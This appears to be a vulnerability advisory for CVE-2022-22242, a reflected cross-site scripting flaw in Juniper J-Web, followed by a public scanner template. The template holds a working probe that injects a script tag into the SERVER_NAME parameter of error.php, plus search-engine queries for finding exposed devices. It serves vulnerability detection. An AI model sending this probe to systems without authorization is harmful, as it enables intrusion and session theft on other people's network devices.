Juniper Web Device Manager (J-Web) in Junos OS contains a cross-site scripting vulnerability. This can allow an unauthenticated attacker to run malicious scripts reflected off J-Web to the victim's browser in the context of their session within J-Web, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue affects all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2.
PoC代码[已公开]
id: CVE-2022-22242
info:
name: Juniper Web Device Manager - Cross-Site Scripting
author: EvergreenCartoons
severity: medium
description: |
Juniper Web Device Manager (J-Web) in Junos OS contains a cross-site scripting vulnerability. This can allow an unauthenticated attacker to run malicious scripts reflected off J-Web to the victim's browser in the context of their session within J-Web, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue affects all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Apply the latest security patches or updates provided by Juniper Networks to mitigate this vulnerability.
reference:
- https://octagon.net/blog/2022/10/28/juniper-sslvpn-junos-rce-and-multiple-vulnerabilities/
- https://supportportal.juniper.net/s/article/2022-10-Security-Bulletin-Junos-OS-Multiple-vulnerabilities-in-J-Web?language=en_US
- https://kb.juniper.net/JSA69899
- https://nvd.nist.gov/vuln/detail/CVE-2022-22242
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-22242
cwe-id: CWE-79
epss-score: 0.85707
epss-percentile: 0.99336
cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: juniper
product: junos
shodan-query:
- title:"Juniper Web Device Manager"
- http.title:"juniper web device manager"
fofa-query: title="juniper web device manager"
google-query: intitle:"juniper web device manager"
tags: cve2022,cve,xss,juniper,junos
http:
- method: GET
path:
- '{{BaseURL}}/error.php?SERVER_NAME=<script>alert(document.domain)</script>'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script>"
- "The requested resource is not authorized to view"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 490a0046304402202b814542258cbf8051bef28503f2827e36559e952dd7968ea5a5c3456dabd6100220251cd08a115524340cfbe22b1dd39e3573e44cc127140371d95bbdf36b8c0a8e:922c64590222798bb761d5b6d8e72950